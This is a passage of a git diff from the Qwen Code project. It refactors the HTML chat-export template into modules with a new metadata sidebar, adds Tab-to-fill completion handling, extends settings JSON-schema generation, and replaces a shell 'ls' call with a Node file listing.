0 : 1)}k`; + } + return tokens.toString(); +}; diff --git a/packages/web-templates/src/export-html/src/main.tsx b/packages/web-templates/src/export-html/src/main.tsx index a0d7468ba..8c7c19115 100644 --- a/packages/web-templates/src/export-html/src/main.tsx +++ b/packages/web-templates/src/export-html/src/main.tsx @@ -1,6 +1,9 @@ import './styles.css'; import logoSvg from './favicon.svg'; -import { TempFileModal, useModalState } from './components/TempFileModal'; +import { TempFileModal } from './components/TempFileModal.js'; +import { usePlatformContext } from './components/hooks.js'; +import { MetadataSidebar } from './components/MetadataSidebar.js'; +import { parseChatData, isChatViewerMessage } from './components/utils.js'; declare global { interface Window { @@ -10,6 +13,7 @@ declare global { } const ReactDOM = window.ReactDOM; +const React = window.React; declare const QwenCodeWebUI: { ChatViewer: (props: { @@ -25,27 +29,6 @@ declare const QwenCodeWebUI: { const { ChatViewer, PlatformProvider } = QwenCodeWebUI; -type ChatData = { - messages?: unknown[]; - sessionId?: string; - startTime?: string; -}; - -type PlatformContextValue = { - platform: 'web'; - postMessage: (message: unknown) => void; - onMessage: (handler: (event: MessageEvent) => void) => () => void; - openFile: (path: string) => void; - openTempFile?: (content: string, fileName?: string) => void; - getResourceUrl: () => string | undefined; - features: { - canOpenFile: boolean; - canOpenTempFile?: boolean; - canCopy: boolean; - }; -}; -type ChatViewerMessage = { type?: string } & Record; - const logoSvgWithGradient = (() => { if (!logoSvg) { return logoSvg; @@ -59,87 +42,13 @@ const logoSvgWithGradient = (() => { return withDefs.replace(/fill="[^"]*"/, 'fill="url(#qwen-logo-gradient)"'); })(); -const React = window.React; - -const usePlatformContext = () => { - const { modalState, openModal, closeModal } = useModalState(); - - const platformContext = React.useMemo( - () => - ({ - platform: 'web' as PlatformContextValue['platform'], - postMessage: (message: unknown) => { - console.log('Posted message:', message); - }, - onMessage: (handler: (event: MessageEvent) => void) => { - window.addEventListener('message', handler); - return () => window.removeEventListener('message', handler); - }, - openFile: (path: string) => { - console.log('Opening file:', path); - }, - openTempFile: openModal, - getResourceUrl: () => undefined, - features: { - canOpenFile: false, - canOpenTempFile: true, - canCopy: true, - }, - }) satisfies PlatformContextValue, - [openModal], - ); - - return { platformContext, modalState, closeModal }; -}; - -const isChatViewerMessage = (value: unknown): value is ChatViewerMessage => - Boolean(value) && typeof value === 'object'; - -const parseChatData = (): ChatData => { - const chatDataElement = document.getElementById('chat-data'); - if (!chatDataElement?.textContent) { - return {}; - } - - try { - const parsed = JSON.parse(chatDataElement.textContent) as unknown; - if (parsed && typeof parsed === 'object') { - return parsed as ChatData; - } - return {}; - } catch (error) { - console.error('Failed to parse chat data.', error); - return {}; - } -}; - -const formatSessionDate = (startTime?: string | null) => { - if (!startTime) { - return '-'; - } - - try { - const date = new Date(startTime); - return date.toLocaleString(undefined, { - year: 'numeric', - month: 'short', - day: 'numeric', - hour: '2-digit', - minute: '2-digit', - }); - } catch { - return startTime; - } -}; - const App = () => { const chatData = parseChatData(); const rawMessages = Array.isArray(chatData.messages) ? chatData.messages : []; const messages = rawMessages .filter(isChatViewerMessage) .filter((record) => record.type !== 'system'); - const sessionId = chatData.sessionId ?? '-'; - const sessionDate = formatSessionDate(chatData.startTime); + const metadata = chatData.metadata; const { platformContext, modalState, closeModal } = usePlatformContext(); return ( @@ -157,21 +66,14 @@ const App = () => { -
-
- Session Id - {sessionId} -
-
- Export Time - {sessionDate} -
-
-
- - - +
+
+ + + +
+ {metadata && }
diff --git a/packages/web-templates/src/export-html/src/styles.css b/packages/web-templates/src/export-html/src/styles.css index e8286b2c5..df0f157e6 100644 --- a/packages/web-templates/src/export-html/src/styles.css +++ b/packages/web-templates/src/export-html/src/styles.css @@ -144,14 +144,6 @@ body { color: #71717a; } -.chat-container { - width: 100%; - max-width: 900px; - padding: 40px 20px; - box-sizing: border-box; - flex: 1; -} - ::-webkit-scrollbar { width: 10px; height: 10px; @@ -201,3 +193,192 @@ body { padding: 16px 12px; } } + +/* Main layout - sidebar on right, messages on left */ +.content-wrapper { + display: flex; + width: 100%; + max-width: 1600px; + height: calc(100vh - 73px); +} + +.chat-container { + flex: 1; + min-width: 0; + overflow-y: auto; + padding: 24px; + box-sizing: border-box; +} + +/* Metadata Sidebar - fixed on right */ +.metadata-sidebar { + width: 320px; + min-width: 320px; + padding: 12px; + border-right: 1px solid var(--border-color); + background-color: var(--bg-secondary); + display: flex; + flex-direction: column; + gap: 12px; + overflow-y: auto; + height: 100%; + box-sizing: border-box; +} + +.metadata-section { + display: flex; + flex-direction: column; + gap: 8px; +} + +.metadata-section-title { + font-size: 10px; + font-weight: 600; + color: var(--text-secondary); + text-transform: uppercase; + letter-spacing: 0.05em; + margin: 0; + padding-bottom: 4px; + border-bottom: 1px solid var(--border-color); +} + +.metadata-section-small { + margin-top: auto; + padding-top: 12px; + border-top: 1px solid var(--border-color); +} + +.metadata-item { + display: flex; + flex-direction: column; + gap: 2px; +} + +.metadata-item-empty { + font-size: 12px; + color: #71717a; + margin: 0; + padding: 4px 0; +} + +.metadata-content { + display: flex; + flex-direction: column; + gap: 2px; + min-width: 0; +} + +.metadata-content .metadata-label { + font-size: 10px; + color: #71717a; +} + +.metadata-content .metadata-value { + font-size: 12px; + color: var(--text-primary); + word-break: break-all; + line-height: 1.3; + cursor: pointer; +} + +.metadata-content .metadata-value.multiline { + white-space: pre-wrap; +} + +.metadata-content .metadata-value.text-green { + color: #22c55e; +} + +.metadata-content .metadata-value.text-red { + color: #ef4444; +} + +.metadata-value-with-copy { + display: flex; + align-items: center; + gap: 8px; +} + +.metadata-value-with-copy .metadata-value { + flex: 1; + min-width: 0; +} + +.copy-button { + display: inline-flex; + align-items: center; + justify-content: center; + padding: 4px; + background: transparent; + border: 1px solid var(--border-color, #3f3f46); + border-radius: 4px; + color: var(--text-secondary, #a1a1aa); + cursor: pointer; + transition: all 0.15s ease; + flex-shrink: 0; +} + +.copy-button:hover { + background: var(--bg-hover, #27272a); + color: var(--text-primary, #f4f4f5); + border-color: var(--border-hover, #52525b); +} + +.copy-button:active { + transform: scale(0.95); +} + +/* Responsive adjustments */ +@media (max-width: 1024px) { + .metadata-sidebar { + width: 320px; + min-width: 320px; + padding: 10px; + } +} + +@media (max-width: 768px) { + .content-wrapper { + flex-direction: column; + height: auto; + } + + .chat-container { + height: auto; + min-height: 50vh; + } + + .metadata-sidebar { + width: 100%; + min-width: 100%; + height: auto; + max-height: none; + border-right: none; + border-top: 1px solid var(--border-color); + padding: 12px; + gap: 12px; + } + + .metadata-section { + flex-direction: row; + flex-wrap: wrap; + gap: 12px; + } + + .metadata-section-title { + width: 100%; + border-bottom: none; + padding-bottom: 0; + } + + .metadata-item { + flex: 1; + min-width: 140px; + } + + .metadata-section-small { + margin-top: 0; + padding-top: 0; + border-top: none; + } +} diff --git a/packages/webui/package.json b/packages/webui/package.json index 46e2e26dc..da5a463ab 100644 --- a/packages/webui/package.json +++ b/packages/webui/package.json @@ -1,6 +1,6 @@ { "name": "@qwen-code/webui", - "version": "0.12.3", + "version": "0.13.0", "description": "Shared UI components for Qwen Code packages", "type": "module", "main": "./dist/index.cjs", diff --git a/packages/webui/src/components/layout/CompletionMenu.tsx b/packages/webui/src/components/layout/CompletionMenu.tsx index 06727f7ee..eeefd6da7 100644 --- a/packages/webui/src/components/layout/CompletionMenu.tsx +++ b/packages/webui/src/components/layout/CompletionMenu.tsx @@ -17,8 +17,10 @@ import type { CompletionItem } from '../../types/completion.js'; export interface CompletionMenuProps { /** List of completion items to display */ items: CompletionItem[]; - /** Callback when an item is selected */ + /** Callback when an item is selected (Enter / click) */ onSelect: (item: CompletionItem) => void; + /** Optional callback for Tab selection (fill without executing). Falls back to onSelect. */ + onFill?: (item: CompletionItem) => void; /** Callback when menu should close */ onClose: () => void; /** Optional section title */ @@ -75,6 +77,7 @@ const groupItems = ( export const CompletionMenu: FC = ({ items, onSelect, + onFill, onClose, title, selectedIndex = 0, @@ -123,12 +126,17 @@ export const CompletionMenu: FC = ({ setSelected((prev) => Math.max(prev - 1, 0)); break; case 'Enter': - case 'Tab': event.preventDefault(); if (items[selected]) { onSelect(items[selected]); } break; + case 'Tab': + event.preventDefault(); + if (items[selected]) { + (onFill ?? onSelect)(items[selected]); + } + break; case 'Escape': event.preventDefault(); onClose(); @@ -144,7 +152,7 @@ export const CompletionMenu: FC = ({ document.removeEventListener('mousedown', handleClickOutside); document.removeEventListener('keydown', handleKeyDown); }; - }, [items, selected, onSelect, onClose]); + }, [items, selected, onSelect, onFill, onClose]); useEffect(() => { // Only scroll into view for keyboard navigation, not mouse hover diff --git a/packages/webui/src/components/layout/InputForm.tsx b/packages/webui/src/components/layout/InputForm.tsx index e77f57e24..7edfac03b 100644 --- a/packages/webui/src/components/layout/InputForm.tsx +++ b/packages/webui/src/components/layout/InputForm.tsx @@ -111,8 +111,10 @@ export interface InputFormProps { completionIsOpen: boolean; /** Completion items */ completionItems?: CompletionItem[]; - /** Completion select callback */ + /** Completion select callback (Enter / click) */ onCompletionSelect?: (item: CompletionItem) => void; + /** Completion fill callback (Tab — fill without executing). Falls back to onCompletionSelect. */ + onCompletionFill?: (item: CompletionItem) => void; /** Completion close callback */ onCompletionClose?: () => void; /** Placeholder text */ @@ -170,6 +172,7 @@ export const InputForm: FC = ({ completionIsOpen, completionItems, onCompletionSelect, + onCompletionFill, onCompletionClose, placeholder = 'Ask Qwen Code …', }) => { @@ -242,6 +245,7 @@ export const InputForm: FC = ({ diff --git a/packages/webui/src/components/messages/MarkdownRenderer/MarkdownRenderer.css b/packages/webui/src/components/messages/MarkdownRenderer/MarkdownRenderer.css index c53725e49..45f16499c 100644 --- a/packages/webui/src/components/messages/MarkdownRenderer/MarkdownRenderer.css +++ b/packages/webui/src/components/messages/MarkdownRenderer/MarkdownRenderer.css @@ -182,14 +182,9 @@ monospace ); font-size: 0.95em; - color: var(--app-link-foreground, #007acc); - text-decoration: underline; + color: inherit; + text-decoration: none; cursor: pointer; - transition: color 0.1s ease; -} - -.markdown-content .file-path-link:hover { - color: var(--app-link-active-foreground, #005a9e); } .markdown-content hr { diff --git a/scripts/generate-settings-schema.ts b/scripts/generate-settings-schema.ts index 9d13e8166..903131219 100644 --- a/scripts/generate-settings-schema.ts +++ b/scripts/generate-settings-schema.ts @@ -21,6 +21,7 @@ import { fileURLToPath } from 'node:url'; import type { SettingDefinition, + SettingItemDefinition, SettingsSchema, } from '../packages/cli/src/config/settingsSchema.js'; import { getSettingsSchema } from '../packages/cli/src/config/settingsSchema.js'; @@ -37,6 +38,57 @@ interface JsonSchemaProperty { enum?: (string | number)[]; default?: unknown; additionalProperties?: boolean | JsonSchemaProperty; + required?: string[]; +} + +function convertItemDefinitionToJsonSchema( + itemDef: SettingItemDefinition, +): JsonSchemaProperty { + const schema: JsonSchemaProperty = {}; + + if (itemDef.description) { + schema.description = itemDef.description; + } + + schema.type = itemDef.type; + + if (itemDef.enum) { + schema.enum = itemDef.enum; + } + + if (itemDef.type === 'object' && itemDef.properties) { + schema.properties = {}; + const requiredFields: string[] = []; + + for (const [key, childDef] of Object.entries(itemDef.properties)) { + const childSchema = convertItemDefinitionToJsonSchema(childDef); + schema.properties[key] = childSchema; + if (childDef.required) { + requiredFields.push(key); + } + } + + if (requiredFields.length > 0) { + schema.required = requiredFields; + } + } + + if (itemDef.type === 'object' && itemDef.additionalProperties !== undefined) { + if (typeof itemDef.additionalProperties === 'boolean') { + schema.additionalProperties = itemDef.additionalProperties; + } else { + schema.additionalProperties = convertItemDefinitionToJsonSchema( + itemDef.additionalProperties, + ); + } + } + + if (itemDef.items) { + schema.type = 'array'; + schema.items = convertItemDefinitionToJsonSchema(itemDef.items); + } + + return schema; } function convertSettingToJsonSchema( @@ -60,7 +112,11 @@ function convertSettingToJsonSchema( break; case 'array': schema.type = 'array'; - schema.items = { type: 'string' }; + if (setting.items) { + schema.items = convertItemDefinitionToJsonSchema(setting.items); + } else { + schema.items = { type: 'string' }; + } break; case 'enum': if (setting.options && setting.options.length > 0) { diff --git a/scripts/prepare-package.js b/scripts/prepare-package.js index 3ae9d3e08..497fdaff9 100644 --- a/scripts/prepare-package.js +++ b/scripts/prepare-package.js @@ -13,7 +13,6 @@ import fs from 'node:fs'; import path from 'node:path'; import { fileURLToPath } from 'node:url'; -import { execSync } from 'node:child_process'; const __filename = fileURLToPath(import.meta.url); const __dirname = path.dirname(__filename); @@ -179,4 +178,17 @@ fs.writeFileSync( console.log('\n✅ Package prepared for publishing at dist/'); console.log('\nPackage structure:'); -execSync('ls -lh dist/', { stdio: 'inherit', cwd: rootDir }); +// Use Node.js to list directory contents (cross-platform) +const distFiles = fs.readdirSync(distDir); +for (const file of distFiles) { + const filePath = path.join(distDir, file); + const stats = fs.statSync(filePath); + const size = stats.isDirectory() ? '' : formatBytes(stats.size); + console.log(` ${size.padEnd(12)} ${file}`); +} + +function formatBytes(bytes) { + if (bytes < 1024) return `${bytes}B`; + if (bytes < 1024 * 1024) return `${(bytes / 1024).toFixed(1)}KB`; + return `${(bytes / (1024 * 1024)).toFixed(1)}MB`; +}